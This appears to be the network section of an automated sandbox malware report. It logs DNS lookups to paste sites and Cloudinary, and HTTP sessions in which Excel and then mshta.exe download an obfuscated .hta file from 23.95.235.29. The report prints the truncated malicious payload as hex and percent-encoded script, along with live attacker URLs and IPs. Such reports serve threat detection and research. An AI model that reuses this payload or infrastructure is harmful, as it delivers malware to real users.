                                                                                                                    Dec 11, 2024 10:54:11.488360882 CET8.8.8.8192.168.2.220xf50No error (0)paste.rs45.63.94.214A (IP address)IN (0x0001)false
                                                                                                                    Dec 11, 2024 10:54:11.622334957 CET8.8.8.8192.168.2.220xf50No error (0)paste.rs45.63.94.214A (IP address)IN (0x0001)false
                                                                                                                    Dec 11, 2024 10:54:16.265769005 CET8.8.8.8192.168.2.220x3a79No error (0)res.cloudinary.comcloudinary.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Dec 11, 2024 10:54:16.265769005 CET8.8.8.8192.168.2.220x3a79No error (0)cloudinary.map.fastly.net151.101.1.137A (IP address)IN (0x0001)false
                                                                                                                    Dec 11, 2024 10:54:16.265769005 CET8.8.8.8192.168.2.220x3a79No error (0)cloudinary.map.fastly.net151.101.65.137A (IP address)IN (0x0001)false
                                                                                                                    Dec 11, 2024 10:54:16.265769005 CET8.8.8.8192.168.2.220x3a79No error (0)cloudinary.map.fastly.net151.101.193.137A (IP address)IN (0x0001)false
                                                                                                                    Dec 11, 2024 10:54:16.265769005 CET8.8.8.8192.168.2.220x3a79No error (0)cloudinary.map.fastly.net151.101.129.137A (IP address)IN (0x0001)false
                                                                                                                    Dec 11, 2024 10:54:16.797605038 CET8.8.8.8192.168.2.220xec8fNo error (0)res.cloudinary.comcloudinary.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Dec 11, 2024 10:54:16.797605038 CET8.8.8.8192.168.2.220xec8fNo error (0)cloudinary.map.fastly.net151.101.65.137A (IP address)IN (0x0001)false
                                                                                                                    Dec 11, 2024 10:54:16.797605038 CET8.8.8.8192.168.2.220xec8fNo error (0)cloudinary.map.fastly.net151.101.129.137A (IP address)IN (0x0001)false
                                                                                                                    Dec 11, 2024 10:54:16.797605038 CET8.8.8.8192.168.2.220xec8fNo error (0)cloudinary.map.fastly.net151.101.1.137A (IP address)IN (0x0001)false
                                                                                                                    Dec 11, 2024 10:54:16.797605038 CET8.8.8.8192.168.2.220xec8fNo error (0)cloudinary.map.fastly.net151.101.193.137A (IP address)IN (0x0001)false
                                                                                                                    Dec 11, 2024 10:54:18.266504049 CET8.8.8.8192.168.2.220x1a99No error (0)short.ruksk.com54.150.207.131A (IP address)IN (0x0001)false
                                                                                                                    Dec 11, 2024 10:54:18.435342073 CET8.8.8.8192.168.2.220x1a99No error (0)short.ruksk.com54.150.207.131A (IP address)IN (0x0001)false
                                                                                                                    Dec 11, 2024 10:54:18.569461107 CET8.8.8.8192.168.2.220x1a99No error (0)short.ruksk.com54.150.207.131A (IP address)IN (0x0001)false
                                                                                                                    Dec 11, 2024 10:54:18.704317093 CET8.8.8.8192.168.2.220x1a99No error (0)short.ruksk.com54.150.207.131A (IP address)IN (0x0001)false
                                                                                                                    Dec 11, 2024 10:54:18.826812983 CET8.8.8.8192.168.2.220x1a99No error (0)short.ruksk.com54.150.207.131A (IP address)IN (0x0001)false
                                                                                                                    Dec 11, 2024 10:54:30.516330957 CET8.8.8.8192.168.2.220x2b4aNo error (0)paste.rs45.63.94.214A (IP address)IN (0x0001)false
                                                                                                                    Dec 11, 2024 10:54:30.771547079 CET8.8.8.8192.168.2.220x2b4aNo error (0)paste.rs45.63.94.214A (IP address)IN (0x0001)false
                                                                                                                    Dec 11, 2024 10:54:35.416995049 CET8.8.8.8192.168.2.220x91dcNo error (0)res.cloudinary.comcloudinary.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Dec 11, 2024 10:54:35.416995049 CET8.8.8.8192.168.2.220x91dcNo error (0)cloudinary.map.fastly.net151.101.1.137A (IP address)IN (0x0001)false
                                                                                                                    Dec 11, 2024 10:54:35.416995049 CET8.8.8.8192.168.2.220x91dcNo error (0)cloudinary.map.fastly.net151.101.65.137A (IP address)IN (0x0001)false
                                                                                                                    Dec 11, 2024 10:54:35.416995049 CET8.8.8.8192.168.2.220x91dcNo error (0)cloudinary.map.fastly.net151.101.129.137A (IP address)IN (0x0001)false
                                                                                                                    Dec 11, 2024 10:54:35.416995049 CET8.8.8.8192.168.2.220x91dcNo error (0)cloudinary.map.fastly.net151.101.193.137A (IP address)IN (0x0001)false
                                                                                                                    Dec 11, 2024 10:54:35.630625963 CET8.8.8.8192.168.2.220xdb92No error (0)res.cloudinary.comcloudinary.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Dec 11, 2024 10:54:35.630625963 CET8.8.8.8192.168.2.220xdb92No error (0)cloudinary.map.fastly.net151.101.1.137A (IP address)IN (0x0001)false
                                                                                                                    Dec 11, 2024 10:54:35.630625963 CET8.8.8.8192.168.2.220xdb92No error (0)cloudinary.map.fastly.net151.101.193.137A (IP address)IN (0x0001)false
                                                                                                                    Dec 11, 2024 10:54:35.630625963 CET8.8.8.8192.168.2.220xdb92No error (0)cloudinary.map.fastly.net151.101.65.137A (IP address)IN (0x0001)false
                                                                                                                    Dec 11, 2024 10:54:35.630625963 CET8.8.8.8192.168.2.220xdb92No error (0)cloudinary.map.fastly.net151.101.129.137A (IP address)IN (0x0001)false
                                                                                                                    Dec 11, 2024 10:54:37.202156067 CET8.8.8.8192.168.2.220x26c4No error (0)paste.ee188.114.97.6A (IP address)IN (0x0001)false
                                                                                                                    Dec 11, 2024 10:54:37.202156067 CET8.8.8.8192.168.2.220x26c4No error (0)paste.ee188.114.96.6A (IP address)IN (0x0001)false
                                                                                                                    Dec 11, 2024 10:54:37.335875988 CET8.8.8.8192.168.2.220x26c4No error (0)paste.ee188.114.97.6A (IP address)IN (0x0001)false
                                                                                                                    Dec 11, 2024 10:54:37.335875988 CET8.8.8.8192.168.2.220x26c4No error (0)paste.ee188.114.96.6A (IP address)IN (0x0001)false
                                                                                                                    Dec 11, 2024 10:54:37.575030088 CET8.8.8.8192.168.2.220x26c4No error (0)paste.ee188.114.97.6A (IP address)IN (0x0001)false
                                                                                                                    Dec 11, 2024 10:54:37.575030088 CET8.8.8.8192.168.2.220x26c4No error (0)paste.ee188.114.96.6A (IP address)IN (0x0001)false
                                                                                                                    Dec 11, 2024 10:54:37.708708048 CET8.8.8.8192.168.2.220x26c4No error (0)paste.ee188.114.96.6A (IP address)IN (0x0001)false
                                                                                                                    Dec 11, 2024 10:54:37.708708048 CET8.8.8.8192.168.2.220x26c4No error (0)paste.ee188.114.97.6A (IP address)IN (0x0001)false
                                                                                                                    Dec 11, 2024 10:54:37.842483044 CET8.8.8.8192.168.2.220x26c4No error (0)paste.ee188.114.97.6A (IP address)IN (0x0001)false
                                                                                                                    Dec 11, 2024 10:54:37.842483044 CET8.8.8.8192.168.2.220x26c4No error (0)paste.ee188.114.96.6A (IP address)IN (0x0001)false
                                                                                                                    Dec 11, 2024 10:54:52.605168104 CET8.8.8.8192.168.2.220x1aedNo error (0)paste.ee188.114.97.6A (IP address)IN (0x0001)false
                                                                                                                    Dec 11, 2024 10:54:52.605168104 CET8.8.8.8192.168.2.220x1aedNo error (0)paste.ee188.114.96.6A (IP address)IN (0x0001)false
                                                                                                                    Dec 11, 2024 10:54:52.848691940 CET8.8.8.8192.168.2.220x1aedNo error (0)paste.ee188.114.97.6A (IP address)IN (0x0001)false
                                                                                                                    Dec 11, 2024 10:54:52.848691940 CET8.8.8.8192.168.2.220x1aedNo error (0)paste.ee188.114.96.6A (IP address)IN (0x0001)false
                                                                                                                    Dec 11, 2024 10:54:52.982636929 CET8.8.8.8192.168.2.220x1aedNo error (0)paste.ee188.114.97.6A (IP address)IN (0x0001)false
                                                                                                                    Dec 11, 2024 10:54:52.982636929 CET8.8.8.8192.168.2.220x1aedNo error (0)paste.ee188.114.96.6A (IP address)IN (0x0001)false
                                                                                                                    Dec 11, 2024 10:54:53.116955996 CET8.8.8.8192.168.2.220x1aedNo error (0)paste.ee188.114.96.6A (IP address)IN (0x0001)false
                                                                                                                    Dec 11, 2024 10:54:53.116955996 CET8.8.8.8192.168.2.220x1aedNo error (0)paste.ee188.114.97.6A (IP address)IN (0x0001)false
                                                                                                                    Dec 11, 2024 10:54:53.239228010 CET8.8.8.8192.168.2.220x1aedNo error (0)paste.ee188.114.97.6A (IP address)IN (0x0001)false
                                                                                                                    Dec 11, 2024 10:54:53.239228010 CET8.8.8.8192.168.2.220x1aedNo error (0)paste.ee188.114.96.6A (IP address)IN (0x0001)false
                                                                                                                    • short.ruksk.com
                                                                                                                    • paste.rs
                                                                                                                    • res.cloudinary.com
                                                                                                                    • 23.95.235.29
                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    0192.168.2.224916223.95.235.29803220C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Dec 11, 2024 10:53:53.419080019 CET384OUTGET /808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta HTTP/1.1
                                                                                                                    Accept: */*
                                                                                                                    UA-CPU: AMD64
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                    Host: 23.95.235.29
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Dec 11, 2024 10:53:54.535921097 CET1236INHTTP/1.1 200 OK
                                                                                                                    Date: Wed, 11 Dec 2024 09:53:54 GMT
                                                                                                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                    Last-Modified: Wed, 11 Dec 2024 05:43:36 GMT
                                                                                                                    ETag: "14551-628f814321468"
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    Content-Length: 83281
                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Content-Type: application/hta
                                                                                                                    Data Raw: 3c 53 63 72 69 70 74 20 4c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 73 63 72 69 70 74 27 3e 0d 0a 3c 21 2d 2d 20 48 54 4d 4c 20 45 6e 63 72 79 70 74 69 6f 6e 20 70 72 6f 76 69 64 65 64 20 62 79 20 74 75 66 61 74 2e 63 6f 6d 20 2d 2d 3e 0d 0a 3c 21 2d 2d 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 75 6e 65 73 63 61 70 65 28 27 25 33 43 25 35 33 25 36 33 25 37 32 25 36 39 25 37 30 25 37 34 25 32 30 25 34 43 25 36 31 25 36 45 25 36 37 25 37 35 25 36 31 25 36 37 25 36 35 25 33 44 25 32 37 25 34 41 25 36 31 25 37 36 25 36 31 25 37 33 25 36 33 25 37 32 25 36 39 25 37 30 25 37 34 25 32 37 25 33 45 25 30 41 25 33 43 25 32 31 25 32 44 25 32 44 25 32 30 25 34 38 25 35 34 25 34 44 25 34 43 25 32 30 25 34 35 25 36 45 25 36 33 25 37 32 25 37 39 25 37 30 25 37 34 25 36 39 25 36 46 25 36 45 25 32 30 25 37 30 25 37 32 25 36 46 25 37 36 25 36 39 25 36 34 25 36 35 25 36 34 25 32 30 25 36 32 25 37 39 25 32 30 25 37 34 25 37 35 25 36 36 25 36 31 25 37 34 25 32 45 25 36 33 25 36 46 25 36 44 25 32 30 25 32 44 25 32 [TRUNCATED]
                                                                                                                    Data Ascii: <Script Language='Javascript'>... HTML Encryption provided by tufat.com -->...document.write(unescape('%3C%53%63%72%69%70%74%20%4C%61%6E%67%75%61%67%65%3D%27%4A%61%76%61%73%63%72%69%70%74%27%3E%0A%3C%21%2D%2D%20%48%54%4D%4C%20%45%6E%63%72%79%70%74%69%6F%6E%20%70%72%6F%76%69%64%65%64%20%62%79%20%74%75%66%61%74%2E%63%6F%6D%20%2D%2D%3E%0A%3C%21%2D%2D%0A%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%27%25%33%43%25%32%31%25%34%34%25%34%46%25%34%33%25%35%34%25%35%39%25%35%30%25%34%35%25%32%30%25%36%38%25%37%34%25%36%44%25%36%43%25%33%45%25%30%41%25%33%43%25%36%44%25%36%35%25%37%34%25%36%31%25%32%30%25%36%38%25%37%34%25%37%34%25%37%30%25%32%44%25%36%35%25%37%31%25%37%35%25%36%39%25%37%36%25%33%44%25%32%32%25%35%38%25%32%44%25%35%35%25%34%31%25%32%44%25%34%33%25%36%46%25%36%44%25%37%30%25%36%31%25%37%34%25%36%39%25%36%32%25%36%43%25%36%35%25%32%32%25%32%30%25%36%33%25%36%46%25%3
                                                                                                                    Dec 11, 2024 10:53:54.536005974 CET1236INData Raw: 36 25 34 35 25 32 35 25 33 37 25 33 34 25 32 35 25 33 36 25 33 35 25 32 35 25 33 36 25 34 35 25 32 35 25 33 37 25 33 34 25 32 35 25 33 33 25 34 34 25 32 35 25 33 32 25 33 32 25 32 35 25 33 34 25 33 39 25 32 35 25 33 34 25 33 35 25 32 35 25 33 33
                                                                                                                    Data Ascii: 6%45%25%37%34%25%36%35%25%36%45%25%37%34%25%33%44%25%32%32%25%34%39%25%34%35%25%33%44%25%34%35%25%36%44%25%37%35%25%36%43%25%36%31%25%37%34%25%36%35%25%34%39%25%34%35%25%33%38%25%32%32%25%32%30%25%33%45%25%30%41%25%33%43%25%36%38%25%37%34%25%3
                                                                                                                    Dec 11, 2024 10:53:54.536019087 CET1236INData Raw: 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30
                                                                                                                    Data Ascii: 0%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%3
                                                                                                                    Dec 11, 2024 10:53:54.536447048 CET1236INData Raw: 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35
                                                                                                                    Data Ascii: 5%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%2
                                                                                                                    Dec 11, 2024 10:53:54.536458969 CET1236INData Raw: 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32
                                                                                                                    Data Ascii: 2%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%3
                                                                                                                    Dec 11, 2024 10:53:54.536470890 CET1236INData Raw: 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30
                                                                                                                    Data Ascii: 0%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%3
                                                                                                                    Dec 11, 2024 10:53:54.536489964 CET776INData Raw: 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35
                                                                                                                    Data Ascii: 5%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%2
                                                                                                                    Dec 11, 2024 10:53:54.537326097 CET1236INData Raw: 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33
                                                                                                                    Data Ascii: 32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%
                                                                                                                    Dec 11, 2024 10:53:54.537338018 CET1236INData Raw: 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33
                                                                                                                    Data Ascii: 30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%
                                                                                                                    Dec 11, 2024 10:53:54.537349939 CET1236INData Raw: 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32
                                                                                                                    Data Ascii: 25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%
                                                                                                                    Dec 11, 2024 10:53:54.655510902 CET1236INData Raw: 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33
                                                                                                                    Data Ascii: 32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    1192.168.2.224916423.95.235.29803516C:\Windows\System32\mshta.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Dec 11, 2024 10:53:58.438482046 CET461OUTGET /808/kcc/nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta HTTP/1.1
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: fr-FR
                                                                                                                    UA-CPU: AMD64
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                    Range: bytes=8897-
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Host: 23.95.235.29
                                                                                                                    If-Range: "14551-628f814321468"
                                                                                                                    Dec 11, 2024 10:53:59.563293934 CET1236INHTTP/1.1 206 Partial Content
                                                                                                                    Date: Wed, 11 Dec 2024 09:53:59 GMT
                                                                                                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                    Last-Modified: Wed, 11 Dec 2024 05:43:36 GMT
                                                                                                                    ETag: "14551-628f814321468"
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    Content-Length: 74384
                                                                                                                    Content-Range: bytes 8897-83280/83281
                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Content-Type: application/hta
                                                                                                                    Data Raw: 35 25 33 37 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 [TRUNCATED]
                                                                                                                    Data Ascii: 5%37%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25
                                                                                                                    Dec 11, 2024 10:53:59.563334942 CET1236INData Raw: 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25
                                                                                                                    Data Ascii: %32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25
                                                                                                                    Dec 11, 2024 10:53:59.563347101 CET1236INData Raw: 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25
                                                                                                                    Data Ascii: %30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%36%33%25%35%32%25%36%35%25%34%31%25%35%34%25%36%35%25%34%46%25%34%32%25%36%41%25%36%35%25%34%33%25%37%34%25%32
                                                                                                                    Dec 11, 2024 10:53:59.563741922 CET1236INData Raw: 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25
                                                                                                                    Data Ascii: %25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%38%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30
                                                                                                                    Dec 11, 2024 10:53:59.563764095 CET1236INData Raw: 25 33 36 25 33 38 25 32 35 25 33 37 25 33 32 25 32 35 25 33 35 25 33 37 25 32 35 25 33 32 25 33 38 25 32 35 25 33 32 25 33 36 25 32 35 25 33 34 25 33 38 25 32 35 25 33 33 25 33 35 25 32 35 25 33 33 25 33 37 25 32 35 25 33 32 25 33 39 25 32 35 25
                                                                                                                    Data Ascii: %36%38%25%37%32%25%35%37%25%32%38%25%32%36%25%34%38%25%33%35%25%33%37%25%32%39%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25
                                                                                                                    Dec 11, 2024 10:53:59.563783884 CET1236INData Raw: 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25
                                                                                                                    Data Ascii: %30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32
                                                                                                                    Dec 11, 2024 10:53:59.563796997 CET1236INData Raw: 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25
                                                                                                                    Data Ascii: %25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30
                                                                                                                    Dec 11, 2024 10:53:59.564544916 CET1236INData Raw: 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25 33 32 25 33 30 25 32 35 25
                                                                                                                    Data Ascii: %32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25%32%30%25
